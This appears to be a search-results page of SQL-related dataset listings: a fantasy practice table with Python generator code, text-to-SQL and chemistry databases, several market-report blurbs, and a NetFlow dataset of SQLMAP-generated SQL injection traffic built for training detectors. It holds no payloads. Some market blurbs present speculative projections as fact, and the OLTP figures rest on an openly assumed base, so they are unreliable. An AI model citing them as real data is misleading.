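
Such a log answers exactly the questions the paragraph raises: who accessed what data, and when the access occurred.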




    From a regional perspective, North America dominates the Data Access Auditing market, accounting for the largest revenue share in 2024, driven by the presence of major t

  11. Adventurers of Venturia

    • kaggle.com
    zip
    Updated Nov 11, 2025
    Cite
    Jasium (2025). Adventurers of Venturia [Dataset]. https://www.kaggle.com/datasets/jasium/adventurers-of-venturia
    Explore at:
    Available download formats: zip (2162 bytes)
    Dataset updated
    Nov 11, 2025
    Authors
    Jasium
    License

    https://creativecommons.org/publicdomain/zero/1.0/

    Description

    A small, fantasy-themed dataset created for learning and practice. It contains 100 adventurers with randomized names, races, classes, kingdoms, levels, and gold amounts for experimenting with SQL and Python.

    SQL Table Creation

    CREATE TABLE Adventurers (
     id INTEGER PRIMARY KEY,
     name TEXT,
     last_name TEXT,
     race TEXT,
     class TEXT,
     kingdom TEXT,
     level INTEGER,
     gold INTEGER
    );
     
    

    Python Names and Attributes

    import random
    
    names = [
      'Aster', 'Antara',
      'Boldak', 'Balta',
      'Corpik', 'Carnda',
      'Defham', 'Dinsa',
      'Enemaliz', 'Enderna',
      'Fansom', 'Falma',
      'Garol', 'Gerna',
      'Hant', 'Hisa',
      'Isder', 'Isba',
      'Jansos', 'Juna',
      'Kornak', 'Kaira',
      'Lomrik', 'Lysara',
      'Mordak', 'Mina',
      'Nerok', 'Nalia',
      'Orim', 'Ossara',
      'Pendar', 'Pella',
      'Quarn', 'Quila',
      'Rundak', 'Rysa',
      'Sornik', 'Selna',
      'Tarnak', 'Tira',
      'Uldan', 'Ursa',
      'Vornik', 'Vela',
      'Wendak', 'Wira',
      'Xalor', 'Xina',
      'Yorik', 'Ysera',
      'Zandor', 'Zyra'
    ]
    
    last_names = [
      'Ashford', 'Blackwood',
      'Coldmoor', 'Duskbane',
      'Eboncrest', 'Frosthelm',
      'Gloomshade', 'Hawkridge',
      'Ironfist', 'Jadeeye',
      'Keenblade', 'Lightfoot',
      'Moonstrike', 'Nightfall',
      'Oakheart', 'Proudmore',
      'Quickwater', 'Ravenhill',
      'Stormborn', 'Thornfield',
      'Umbermoor', 'Valewind',
      'Windrider', 'Xiloscient',
      'Yewbranch', 'Zephyrine'
    ]
    
    races = ['Human', 'Elf', 'Orc', 'Dwarf']
    
    classes = ['Fighter', 'Ranger', 'Thief', 'Assassin', 'Mage', 'Bard', 'Merchant']
    
    kingdoms = [
      'Ironhold',
      'Silverwood',
      'Bloodfang',
      'Stormwind',
      'Shadowmere',
      'Frostveil',
      'Duskmoor',
      'Emberfall'
    ]
    

    SQL Command Generator

    for i in range(1, 101):
      name = random.choice(names)
      last_name = random.choice(last_names)
      race = random.choice(races)
      _class = random.choice(classes)
      kingdom = random.choice(kingdoms)
      level = random.randint(1, 100)
      gold = random.randint(0, 10000)
    
      print(f"INSERT INTO Adventurers (id, name, last_name, race, class, kingdom, level, gold) VALUES ({i}, '{name}', '{last_name}', '{race}', '{_class}', '{kingdom}', {level}, {gold});")
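As an alternative to printing raw INSERT strings, the same loop can feed parameterized queries directly into SQLite, letting the driver handle quoting (a self-contained sketch with abbreviated copies of the attribute lists above):

```python
import random
import sqlite3

# Abbreviated copies of the dataset's attribute lists, for a self-contained demo.
names = ['Aster', 'Boldak', 'Corpik', 'Defham']
last_names = ['Ashford', 'Blackwood', 'Coldmoor', 'Duskbane']
races = ['Human', 'Elf', 'Orc', 'Dwarf']
classes = ['Fighter', 'Ranger', 'Thief', 'Mage']
kingdoms = ['Ironhold', 'Silverwood', 'Bloodfang', 'Stormwind']

con = sqlite3.connect(":memory:")
con.execute("""CREATE TABLE Adventurers (
  id INTEGER PRIMARY KEY, name TEXT, last_name TEXT, race TEXT,
  class TEXT, kingdom TEXT, level INTEGER, gold INTEGER)""")

rows = [
    (i, random.choice(names), random.choice(last_names),
     random.choice(races), random.choice(classes),
     random.choice(kingdoms), random.randint(1, 100), random.randint(0, 10000))
    for i in range(1, 101)
]
# Placeholders let the driver escape values, so names containing
# apostrophes would not break the statement.
con.executemany("INSERT INTO Adventurers VALUES (?, ?, ?, ?, ?, ?, ?, ?)", rows)
con.commit()

print(con.execute("SELECT COUNT(*) FROM Adventurers").fetchone()[0])
```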
    
  12. ReCiterAnalysis.sql.

    • plos.figshare.com
    txt
    Updated Jun 11, 2023
    Cite
    Paul J. Albert; Sarbajit Dutta; Jie Lin; Zimeng Zhu; Michael Bales; Stephen B. Johnson; Mohammad Mansour; Drew Wright; Terrie R. Wheeler; Curtis L. Cole (2023). ReCiterAnalysis.sql. [Dataset]. http://doi.org/10.1371/journal.pone.0244641.s006
    Explore at:
    Available download formats: txt
    Dataset updated
    Jun 11, 2023
    Dataset provided by
    PLOS (http://plos.org/)
    Authors
    Paul J. Albert; Sarbajit Dutta; Jie Lin; Zimeng Zhu; Michael Bales; Stephen B. Johnson; Mohammad Mansour; Drew Wright; Terrie R. Wheeler; Curtis L. Cole
    License

    Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    Database model for storing output of Feature Generator API. Includes some sample data. (SQL)

  13. Distributed SQL Database Market Research Report 2033

    • dataintelo.com
    csv, pdf, pptx
    Updated Sep 30, 2025
    Cite
    Dataintelo (2025). Distributed SQL Database Market Research Report 2033 [Dataset]. https://dataintelo.com/report/distributed-sql-database-market
    Explore at:
    Available download formats: csv, pptx, pdf
    Dataset updated
    Sep 30, 2025
    Dataset authored and provided by
    Dataintelo
    License

    https://dataintelo.com/privacy-and-policy

    Time period covered
    2024 - 2032
    Area covered
    Global
    Description

    Distributed SQL Database Market Outlook



    According to our latest research, the global Distributed SQL Database market size reached USD 1.75 billion in 2024, marking a significant milestone in the evolution of enterprise data management. With a robust compound annual growth rate (CAGR) of 27.3% from 2025 to 2033, the market is projected to soar to USD 12.5 billion by 2033. This impressive growth trajectory is primarily fueled by the surging demand for scalable, resilient, and highly available database solutions across diverse sectors, driven by the exponential increase in data volumes and the necessity for real-time analytics in mission-critical applications.




    The primary growth factor underpinning the expansion of the Distributed SQL Database market is the escalating requirement for high availability and fault tolerance in enterprise IT environments. Modern organizations are increasingly adopting distributed architectures to ensure uninterrupted business operations, even in the face of hardware failures or network outages. Distributed SQL databases, with their inherent capability to replicate data across multiple nodes and geographies, offer a compelling solution for enterprises seeking to minimize downtime and data loss. This demand is further amplified by the proliferation of cloud-native applications and microservices architectures, where traditional monolithic databases struggle to keep pace with the needs of dynamic, distributed workloads.




    Another key driver for the Distributed SQL Database market is the rapid digital transformation initiatives being undertaken across industries such as BFSI, retail, healthcare, and manufacturing. Enterprises are leveraging distributed SQL databases to enable real-time analytics, support omnichannel customer experiences, and meet stringent regulatory requirements for data integrity and security. The increasing adoption of Internet of Things (IoT) devices and edge computing is also generating vast amounts of decentralized data, necessitating distributed database solutions that can seamlessly scale and process information at the edge while maintaining transactional consistency and global visibility.




    Moreover, the growing preference for hybrid and multi-cloud strategies is accelerating the adoption of distributed SQL databases. As organizations seek to avoid vendor lock-in and optimize their IT infrastructure for cost, performance, and compliance, distributed SQL databases provide the flexibility to deploy workloads across on-premises, public cloud, and edge environments. This flexibility not only enhances operational agility but also empowers enterprises to respond swiftly to changing business requirements and regulatory landscapes. The ability of distributed SQL databases to offer strong consistency, horizontal scalability, and global data distribution is positioning them as a foundational technology in the era of digital business.




    From a regional perspective, North America currently dominates the Distributed SQL Database market, accounting for the largest share in 2024, driven by the presence of leading technology vendors, early adoption of cloud-native solutions, and substantial investments in digital infrastructure. Asia Pacific, however, is emerging as the fastest-growing region, propelled by rapid economic development, expanding digital ecosystems, and increasing adoption of advanced data management solutions in countries such as China, India, and Japan. Europe and Latin America are also witnessing steady growth, supported by digital transformation initiatives and the rising demand for real-time data analytics across various sectors.



    Component Analysis



    The Distributed SQL Database market is segmented by component into Software and Services, with each category playing a vital role in the overall ecosystem. The software segment, encompassing database engines, management tools, and integration platforms, accounted for the lion’s share of the market revenue in 2024. This dominance can be attributed to the continuous innovation in database architectures, improvements in query optimization, and the integration of advanced features such as automated failover, distributed transactions, and real-time analytics. Vendors are focusing on enhancing their software offerings to support a wide array of deployment scenarios, including hybrid cloud, multi-cloud, and edge environments, which is further boosting the demand for robust distributed

  14. Fuel-NY Emergency Generators and Transfer Switches

    • splitgraph.com
    • data.ny.gov
    • +1more
    Updated Jul 1, 2024
    + more versions
    Cite
    New York State Energy Research and Development Authority (NYSERDA) (2024). Fuel-NY Emergency Generators and Transfer Switches [Dataset]. https://www.splitgraph.com/ny-gov/fuelny-emergency-generators-and-transfer-switches-i67p-6ac2
    Explore at:
    Available download formats: application/openapi+json, json, application/vnd.splitgraph.image
    Dataset updated
    Jul 1, 2024
    Dataset provided by
    New York State Energy Research and Development Authority (https://www.nyserda.ny.gov/)
    Authors
    New York State Energy Research and Development Authority (NYSERDA)
    Area covered
    New York
    Description

    NYSERDA deployed Emergency Generators and Transfer Switches at Retail Gas Stations as part of the Fuel-NY initiative through its Gas Station Back-up Power Program and Permanent Generator Program using FEMA Hazard Mitigation Grant Program funding. This dataset is a complete listing of all installations under the two programs, which ran from 6/1/2013 through 1/26/2019. This dataset contains business names, locations, and the type of installation for program participants.

    These efforts improved the resiliency of the retail gasoline system in the downstate New York area by providing back up power options to gas stations.

    These stations have either the capability to easily accept backup power or have a backup generator permanently installed on site. The equipment allows the stations to mitigate the effects of power outages, increase the availability of fuel, and support first responders during and after emergencies and severe weather events. Additional socioeconomic benefits are achieved by supporting residents and early recovery efforts with continued access to fuel as well as food, grocery, and necessary household items, increasing the resiliency capabilities of their communities.

    The New York State Energy Research and Development Authority (NYSERDA) offers objective information and analysis, innovative programs, technical expertise, and support to help New Yorkers increase energy efficiency, save money, use renewable energy, accelerate economic growth, and reduce reliance on fossil fuels. To learn more about NYSERDA’s programs, visit nyserda.ny.gov or follow us on X, Facebook, YouTube, or Instagram.

    Splitgraph serves as an HTTP API that lets you run SQL queries directly on this data to power Web applications.

    See the Splitgraph documentation for more information.

  15. Portuguese Text2SQL database

    • kaggle.com
    Updated Jun 19, 2024
    Cite
    Eduardo M. de Morais (2024). Portuguese Text2SQL database [Dataset]. https://www.kaggle.com/datasets/emdemor/portuguese-text2sql-database
    Explore at:
    Croissant: a format for machine-learning datasets. Learn more at mlcommons.org/croissant.
    Dataset updated
    Jun 19, 2024
    Dataset provided by
    Kaggle (http://kaggle.com/)
    Authors
    Eduardo M. de Morais
    License

    Attribution-NonCommercial-ShareAlike 4.0 (CC BY-NC-SA 4.0)https://creativecommons.org/licenses/by-nc-sa/4.0/
    License information was derived automatically

    Description

    Overview

    This dataset is a Portuguese-translated version of the b-mc2/sql-create-context dataset, which was constructed from the WikiSQL and Spider datasets. It contains examples of questions in Portuguese, SQL CREATE TABLE statements, and SQL queries that answer the questions using the CREATE TABLE statement as context.

    The main goal of this dataset is to assist Portuguese natural language models in generating precise and contextualized SQL queries, preventing the hallucination of column and table names, a common issue in text-to-SQL datasets. By providing only the CREATE TABLE statement as context, the dataset aims to better ground the models without the need to provide actual data rows, limiting token use and exposure to private, sensitive, or proprietary data.

    Dataset Details

    • Total Examples: 78,577
    • Columns:
      • pergunta: The question in natural language.
      • contexto: The SQL CREATE TABLE statement that provides the necessary context to answer the question.
      • resposta: The SQL query that answers the question using the provided context.
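A typical way to use the three columns when fine-tuning a text-to-SQL model is to fold pergunta and contexto into a single prompt and treat resposta as the target. A minimal sketch, with a made-up example row (the prompt template itself is an assumption, not part of the dataset):

```python
def build_example(pergunta, contexto, resposta):
    """Fold question + schema context into one prompt; the SQL is the target."""
    prompt = (
        f"-- Contexto:\n{contexto}\n"
        f"-- Pergunta: {pergunta}\n"
        f"-- SQL:"
    )
    return {"prompt": prompt, "target": resposta}

example = build_example(
    pergunta="Quantos usuários existem?",
    contexto="CREATE TABLE usuarios (id INTEGER, nome TEXT)",
    resposta="SELECT COUNT(*) FROM usuarios",
)
print(example["prompt"])
```

Supplying only the CREATE TABLE statement in the prompt is what grounds the model against hallucinated column and table names, as described above.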

    Translation Process

    The questions were translated into Portuguese using the facebook/nllb-200-distilled-1.3B model, ensuring that the natural language queries maintain the same meaning and context as the original English questions.

    Objective and Applications

    This dataset is ideal for training natural language models for SQL query generation, especially in scenarios where accuracy in naming columns and tables is crucial. It can be used to enhance model performance in text-to-SQL tasks, providing clear context and avoiding common hallucination errors.

    Original Projects

    @misc{b-mc2_2023_sql-create-context,
    title = {sql-create-context Dataset},
    author = {b-mc2},
    year = {2023},
    url = {https://huggingface.co/datasets/b-mc2/sql-create-context},
    note = {This dataset was created by modifying data from the following sources: \cite{zhongSeq2SQL2017, yu2018spider}.},
    }
    
    @article{zhongSeq2SQL2017,
    author = {Victor Zhong and Caiming Xiong and Richard Socher},
    title = {Seq2SQL: Generating Structured Queries from Natural Language using Reinforcement Learning},
    journal = {CoRR},
    volume = {abs/1709.00103},
    year = {2017}
    }
    
    @article{yu2018spider,
    title = {Spider: A large-scale human-labeled dataset for complex and cross-domain semantic parsing and text-to-sql task},
    author = {Yu, Tao and Zhang, Rui and Yang, Kai and Yasunaga, Michihiro and Wang, Dongxu and Li, Zifan and Ma, James and Li, Irene and Yao, Qingning and Roman, Shanelle and others},
    journal = {arXiv preprint arXiv:1809.08887},
    year = {2018}
    }
    
  16. Cloud SQL Market Research Report 2033

    • researchintelo.com
    csv, pdf, pptx
    Updated Jul 24, 2025
    Cite
    Research Intelo (2025). Cloud SQL Market Research Report 2033 [Dataset]. https://researchintelo.com/report/cloud-sql-market
    Explore at:
    Available download formats: pptx, csv, pdf
    Dataset updated
    Jul 24, 2025
    Dataset authored and provided by
    Research Intelo
    License

    https://researchintelo.com/privacy-and-policy

    Time period covered
    2024 - 2033
    Area covered
    Global
    Description

    Cloud SQL Market Outlook



    According to our latest research, the global Cloud SQL market size in 2024 stands at USD 7.8 billion, reflecting robust adoption across industries. The market is poised for significant expansion, projected to reach USD 32.5 billion by 2033, growing at a compelling CAGR of 17.2% during the forecast period. This remarkable growth is primarily driven by the increasing demand for scalable, flexible, and cost-efficient database management solutions that support digital transformation initiatives worldwide.



    A primary growth factor for the Cloud SQL market is the accelerating shift toward cloud-based infrastructure in organizations of all sizes. Enterprises are increasingly migrating their data workloads to the cloud to leverage benefits such as reduced operational costs, enhanced scalability, and improved data accessibility. Cloud SQL solutions, with their managed database services, eliminate the need for manual database maintenance and updates, thereby allowing IT teams to focus on core business activities. Furthermore, the proliferation of data from IoT devices, mobile applications, and digital services is generating an unprecedented amount of structured and unstructured data, necessitating robust database solutions that can seamlessly scale with demand. As organizations prioritize agility and innovation, the adoption of Cloud SQL platforms is becoming integral to their IT strategies.



    Another significant driver is the growing emphasis on data security, compliance, and disaster recovery. Cloud SQL services offer advanced security features, including data encryption, automated backups, and multi-region replication, ensuring business continuity and regulatory compliance. The rise in cyber threats and stringent data protection regulations such as GDPR and HIPAA have made secure data management a top priority for enterprises. By leveraging Cloud SQL, organizations can mitigate the risks associated with data breaches and ensure that their critical business information is protected against potential threats. Additionally, the ability to automate backup and recovery processes reduces downtime and safeguards against data loss, further enhancing the value proposition of cloud-based SQL databases.



    The integration of advanced analytics and artificial intelligence is also catalyzing the expansion of the Cloud SQL market. Organizations are increasingly harnessing the power of business intelligence and analytics tools to extract actionable insights from their data. Cloud SQL platforms facilitate seamless integration with analytics solutions, enabling real-time data processing and visualization. This capability is particularly valuable for industries such as retail, healthcare, and BFSI, where timely insights can drive better decision-making and competitive advantage. As digital transformation accelerates, the need for agile, intelligent, and data-driven operations will continue to fuel the adoption of Cloud SQL solutions across diverse sectors.



    From a regional perspective, North America currently dominates the Cloud SQL market, accounting for the largest share in 2024, driven by the presence of leading cloud service providers, rapid technological advancements, and high digital adoption rates. Europe follows closely, propelled by stringent data privacy regulations and strong demand from sectors such as BFSI and healthcare. The Asia Pacific region is anticipated to witness the fastest growth, with a CAGR exceeding 19%, fueled by increasing cloud adoption among SMEs, government digitalization initiatives, and a burgeoning IT services sector. Meanwhile, Latin America and the Middle East & Africa are gradually catching up, with growing investments in cloud infrastructure and digital transformation projects.



    Database Type Analysis



    The Cloud SQL market is broadly segmented by database type into relational and non-relational databases. Relational databases, such as MySQL, PostgreSQL, and Microsoft SQL Server, continue to dominate the market due to their widespread use in transactional applications and enterprise workloads. These databases are prized for their ability to maintain data integrity, support complex queries, and provide consistent performance. Businesses in industries like BFSI, healthcare, and retail rely heavily on relational databases for mission-critical applications where data accuracy and reliability are paramount. The demand for managed relational database services in the cloud is further boosted by the need for seamless migration fr

  17. SQL Performance Tuning Tools Market Research Report 2033

    • dataintelo.com
    csv, pdf, pptx
    Updated Sep 30, 2025
    + more versions
    Cite
    Dataintelo (2025). SQL Performance Tuning Tools Market Research Report 2033 [Dataset]. https://dataintelo.com/report/sql-performance-tuning-tools-market
    Explore at:
    Available download formats: csv, pdf, pptx
    Dataset updated
    Sep 30, 2025
    Dataset authored and provided by
    Dataintelo
    License

    https://dataintelo.com/privacy-and-policy

    Time period covered
    2024 - 2032
    Area covered
    Global
    Description

    SQL Performance Tuning Tools Market Outlook



    According to our latest research, the global SQL Performance Tuning Tools market size reached USD 1.42 billion in 2024, exhibiting robust expansion driven by the surging need for optimized database management and real-time analytics across enterprises. The market is poised to grow at a CAGR of 9.7% from 2025 to 2033, with the forecasted value expected to hit USD 3.27 billion by 2033. This growth is primarily attributed to the increasing complexity of database environments, the proliferation of data-driven applications, and the urgent demand for high availability and efficiency in mission-critical business operations. As organizations continue to digitize and scale their infrastructure, SQL performance tuning tools are becoming indispensable for ensuring seamless data processing and superior user experiences.




    A significant growth factor for the SQL Performance Tuning Tools market is the exponential increase in data volumes generated by organizations worldwide. Enterprises are embracing digital transformation initiatives, leading to a surge in transactional and analytical workloads that demand high-performing databases. SQL performance tuning tools play a pivotal role in identifying, diagnosing, and resolving performance bottlenecks within SQL queries and database configurations. With the adoption of advanced analytics, artificial intelligence, and machine learning, organizations are generating and processing more data than ever before, necessitating robust tools to ensure optimal database performance. This trend is particularly pronounced in sectors such as BFSI, healthcare, and e-commerce, where data-driven decision-making and real-time insights are critical for competitive advantage.




    Another key driver is the growing complexity of IT environments, particularly with the rise of hybrid and multi-cloud deployments. As enterprises migrate workloads to cloud platforms and integrate on-premises systems with cloud-based solutions, managing and tuning SQL databases becomes increasingly challenging. SQL performance tuning tools enable IT teams to monitor and optimize database performance across diverse and distributed environments, ensuring consistency, reliability, and scalability. These tools offer advanced features such as automated query optimization, real-time monitoring, and predictive analytics, which are essential for maintaining service-level agreements (SLAs) and minimizing downtime. The increasing reliance on cloud infrastructure, coupled with the need for agile and resilient database management, is expected to further propel market growth.




    The expanding ecosystem of database technologies and the proliferation of open-source SQL databases are also fueling demand for performance tuning solutions. Organizations are adopting a wide range of relational and non-relational databases to support diverse workloads, leading to greater heterogeneity in database environments. This diversity introduces new challenges in performance management, as traditional tuning methods may not be effective across different platforms. SQL performance tuning tools are evolving to support a broad spectrum of database engines, providing unified visibility and optimization capabilities. As businesses strive to deliver high-quality digital experiences and minimize operational costs, the adoption of advanced tuning tools is becoming a strategic imperative.




    From a regional perspective, North America continues to dominate the SQL Performance Tuning Tools market, accounting for the largest share in 2024. This leadership is driven by the presence of major technology vendors, a mature IT infrastructure, and early adoption of advanced database management solutions. Europe and Asia Pacific are also witnessing rapid growth, fueled by increasing investments in digital transformation, expanding IT services sectors, and the rise of cloud computing. The Asia Pacific region, in particular, is expected to exhibit the highest CAGR during the forecast period, supported by the proliferation of SMEs, growing e-commerce activities, and government initiatives to promote digital innovation. Meanwhile, Latin America and the Middle East & Africa are emerging as promising markets, albeit at a relatively nascent stage, as organizations in these regions modernize their IT landscapes and embrace data-driven strategies.



    Component Analysis



    The SQL Performance Tuning Tools market by component is broadly segmented into software and servi

  18. OLTP Report

    • archivemarketresearch.com
    doc, pdf, ppt
    Updated May 31, 2025
    Cite
    Archive Market Research (2025). OLTP Report [Dataset]. https://www.archivemarketresearch.com/reports/oltp-559625
    Explore at:
    Available download formats: ppt, pdf, doc
    Dataset updated
    May 31, 2025
    Dataset authored and provided by
    Archive Market Research
    License

    https://www.archivemarketresearch.com/privacy-policy

    Time period covered
    2025 - 2033
    Area covered
    Global
    Variables measured
    Market Size
    Description

    The Online Transaction Processing (OLTP) market is experiencing robust growth, driven by the increasing adoption of cloud-based solutions, the proliferation of mobile and IoT devices generating massive transactional data, and the rising demand for real-time data processing across diverse industries. Let's assume, for illustrative purposes, a 2025 market size of $150 billion, with a Compound Annual Growth Rate (CAGR) of 12% projected for the forecast period of 2025-2033. This signifies a substantial expansion of the market, reaching an estimated value exceeding $400 billion by 2033. Key drivers include the need for enhanced operational efficiency, improved customer experience through faster transaction processing, and the ability to leverage real-time data for informed decision-making. The increasing adoption of advanced technologies like in-memory databases and distributed databases further fuels this growth.

    Significant trends shaping the OLTP market include the shift towards cloud-based deployment models, owing to their scalability, cost-effectiveness, and ease of management. The growing demand for high-availability and fault-tolerant systems is also pushing innovation in database technologies. The integration of artificial intelligence (AI) and machine learning (ML) for predictive analytics and fraud detection within OLTP systems is another key trend gaining momentum.

    While the market faces certain restraints such as data security concerns, integration complexities, and the need for skilled professionals, the overall growth trajectory remains positive, driven by strong market demand and technological advancements. The segment analysis shows a significant contribution from cloud-based OLTP solutions; the market is highly competitive, with key players constantly innovating to maintain their market share.

  19. Z

    pyKinML database

    • data.niaid.nih.gov
    • zenodo.org
    Updated Apr 10, 2024
    Cite
    Martí, Carles; Zádor, Judit; Najm, Habib; Devereux, Christian (2024). pyKinML database [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_10892201
    Explore at:
    Dataset updated
    Apr 10, 2024
    Dataset provided by
    Sandia National Laboratories California
    Authors
    Martí, Carles; Zádor, Judit; Najm, Habib; Devereux, Christian
    License

    Attribution 3.0 (CC BY 3.0)https://creativecommons.org/licenses/by/3.0/
    License information was derived automatically

    Description

    This is a set of SQL databases containing information about molecules and radicals, with the following conventions and content.

    Each database is named as “CnHm”, where n and m range from 1 to 5 and indicate the number of carbon (C) and hydrogen (H) atoms in the structures in the database.

    Each database contains entries for a large number of “CnHm” geometries. Within each database are four tables.

    Table “meta”: contains the name of the database and the date it was created.

    Table “xyz”: the columns of the “xyz” table are the following:

    “id”: a numerical identification number, integer

    “calc_params”: metadata describing the level of theory and other details of the quantum chemical calculations to generate the Hessian used for generating this structure, numpy array stored as a blob.

    “calc”: software used for the calculation, string

    “temp”: the temperature used during the normal mode sampling process to generate the structure in K, outliers are assigned negative temperature, float

    “name”: a unique name describing the anchor point the structure was generated from, string

    “dist”: the normalized unitless distance of the structure from its anchor point at the temperature given in “temp”, float

    “geometry”: atomic coordinates in angstroms, (n+m) by 3 numpy array of floats stored as a blob. Note that the atomic positions are listed with carbons first followed by hydrogens.

    “created_at”: date the structure was generated

    Table “energy”: the columns of the “energy” table are the following:

    “id”: a numerical identification number, not linked to the “id” in “xyz”, integer

    “fidelity”: the fidelity level the energy was calculated at, integer

    0 = B3LYP/6-31+G(d)

    1 = wB97X-D/6-311++G(d,p)

    2 = HF/6-31G

    3 = B3LYP/6-31G

    4 = B2PLYPD3/6-311++G(d,p)

    “E”: molecular energy in eV, float

    “xyz_id”: the “id” of the geometry in the “xyz” table this energy was calculated for, integer

    “hessian”: empty

    “forces”: atomic forces in eV/angstrom, (n+m) by 3 numpy array of floats stored as a blob. Note that the atomic forces are listed in the same order as the atoms in the “geometry” in the “xyz” table

    “calc_params”: metadata describing the level of theory and other details of the energy and force calculations of this entry, numpy array stored as a blob

    “calc”: software used for the energy and force calculation

    “created_at”: date the energy and forces were calculated

    “sample_set_id”: empty

    Table “aev”: currently empty
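Given the schema above, joining a geometry with one of its energies can be sketched as follows. This is a minimal sketch against an in-memory stand-in database: the exact column types, the float64 encoding of the blobs, and all sample values are assumptions for illustration, not the real data.

```python
import sqlite3
import numpy as np

# Minimal stand-in for a "CnHm" database, with only the columns used below.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE xyz (id INTEGER, temp REAL, geometry BLOB)")
conn.execute("CREATE TABLE energy (id INTEGER, fidelity INTEGER, E REAL, xyz_id INTEGER)")

# A C1H4-like entry: (n + m) x 3 = 5 x 3 coordinate array stored as a blob.
geom = np.zeros((5, 3))
conn.execute("INSERT INTO xyz VALUES (1, 300.0, ?)", (geom.tobytes(),))
conn.execute("INSERT INTO energy VALUES (1, 1, -1101.57, 1)")  # fidelity 1 = wB97X-D

# Energies link back to geometries via "xyz_id", not via matching "id" values.
row = conn.execute(
    "SELECT x.geometry, e.E FROM xyz x "
    "JOIN energy e ON e.xyz_id = x.id WHERE e.fidelity = 1"
).fetchone()

# Decode the blob back into an (n + m) x 3 array (float64 dtype is assumed).
coords = np.frombuffer(row[0], dtype=np.float64).reshape(-1, 3)
print(coords.shape, row[1])
```

The same pattern applies to the “forces” blobs in the “energy” table, since they share the geometry's atom ordering (carbons first, then hydrogens).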

  20. D

    SQL Query Audit Tools Market Research Report 2033

    • dataintelo.com
    csv, pdf, pptx
    Updated Oct 1, 2025
    Cite
    Dataintelo (2025). SQL Query Audit Tools Market Research Report 2033 [Dataset]. https://dataintelo.com/report/sql-query-audit-tools-market
    Explore at:
    pdf, pptx, csv
    Available download formats
    Dataset updated
    Oct 1, 2025
    Dataset authored and provided by
    Dataintelo
    License

    https://dataintelo.com/privacy-and-policyhttps://dataintelo.com/privacy-and-policy

    Time period covered
    2024 - 2032
    Area covered
    Global
    Description

    SQL Query Audit Tools Market Outlook



    According to our latest research, the SQL Query Audit Tools market size reached USD 1.26 billion in 2024, reflecting robust adoption across multiple industries. The market is projected to expand at a CAGR of 13.2% from 2025 to 2033, culminating in a forecasted market value of USD 3.69 billion by 2033. This substantial growth trajectory is primarily driven by the escalating demand for robust database security and compliance solutions in an era marked by increasingly stringent data privacy regulations and an upsurge in cyber threats targeting sensitive business information.




    One of the most significant growth factors for the SQL Query Audit Tools market is the rising complexity and volume of enterprise data. Organizations across sectors are generating and handling massive amounts of structured and unstructured data, necessitating advanced auditing mechanisms to ensure data integrity, compliance, and security. The proliferation of digital transformation initiatives, cloud migration, and the adoption of big data analytics have further underscored the need for sophisticated tools capable of auditing SQL queries in real-time. These tools not only help organizations identify suspicious activities and unauthorized access but also play a pivotal role in maintaining regulatory compliance, especially in highly regulated industries such as banking, financial services, and healthcare.




    The growing regulatory landscape is another key driver propelling the SQL Query Audit Tools market. Governments and regulatory bodies worldwide have introduced stringent data protection laws such as GDPR, HIPAA, and CCPA, compelling organizations to implement comprehensive audit trails for all database activities. SQL query audit tools offer granular visibility into database transactions, enabling companies to demonstrate compliance and avoid hefty fines associated with non-compliance. Furthermore, as cyberattacks become more sophisticated, organizations are increasingly recognizing the value of proactive monitoring and auditing solutions that can detect anomalies, prevent data breaches, and support forensic investigations in the event of security incidents.




    Technological advancements and the integration of artificial intelligence and machine learning into SQL query audit tools are also fueling market expansion. Modern solutions are leveraging AI-driven analytics to automate anomaly detection, streamline compliance reporting, and enhance the accuracy of security alerts. Additionally, the shift towards cloud-based deployments is making these tools more accessible to small and medium enterprises (SMEs), which historically faced barriers due to high upfront costs and resource constraints. The combination of technological innovation, regulatory pressure, and the increasing importance of data governance is expected to sustain the strong growth momentum of the SQL Query Audit Tools market in the coming years.




    Regionally, North America currently dominates the SQL Query Audit Tools market, accounting for the largest share in 2024, followed by Europe and the Asia Pacific. The United States, in particular, is witnessing significant adoption driven by the presence of large enterprises, advanced IT infrastructure, and a highly regulated business environment. Europe is also experiencing robust growth, fueled by stringent data protection regulations and increasing investments in cybersecurity solutions. Meanwhile, the Asia Pacific region is poised for the fastest growth over the forecast period, supported by rapid digitalization, expanding IT and telecommunications sectors, and rising awareness about data security among enterprises in emerging economies such as China and India.



    Component Analysis



    The Component segment of the SQL Query Audit Tools market is bifurcated into software and services, each playing a critical role in the overall ecosystem. Software solutions form the backbone of the market, encompassing standalone audit tools, integrated database management platforms, and advanced analytics engines. These software offerings are designed to monitor, log, and analyze SQL queries in real-time, providing detailed audit trails and actionable insights for security, compliance, and performance optimization. The demand for feature-rich, scalable, and user-friendly software is on the rise as organizations seek to automate audit processes and minimize manual intervention.




Cite
Ignacio Crespo; Adrián Campazas (2022). SQL Injection Attack Netflow [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_6907251

Data from: SQL Injection Attack Netflow

Related Article
Explore at:
Dataset updated
Sep 28, 2022
Authors
Ignacio Crespo; Adrián Campazas
License

Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically

Description

Introduction

These datasets contain SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are Union-query SQL injection and Blind SQL injection. To perform the attacks, the SQLMAP tool was used.

NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for collecting and monitoring network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

Datasets

The first dataset was collected to train the detection models (D1); the other was collected using different attacks than those used in training, to test the models and ensure their generalization (D2).

The datasets contain both benign and malicious traffic. All collected datasets are balanced.

The version of NetFlow used to build the datasets is 5.

    Dataset    Aim         Samples    Benign-malicious traffic ratio

    D1         Training    400,003    50%
    D2         Test        57,239     50%

Infrastructure and implementation

Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.

DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds or active for 1800 seconds (30 minutes).
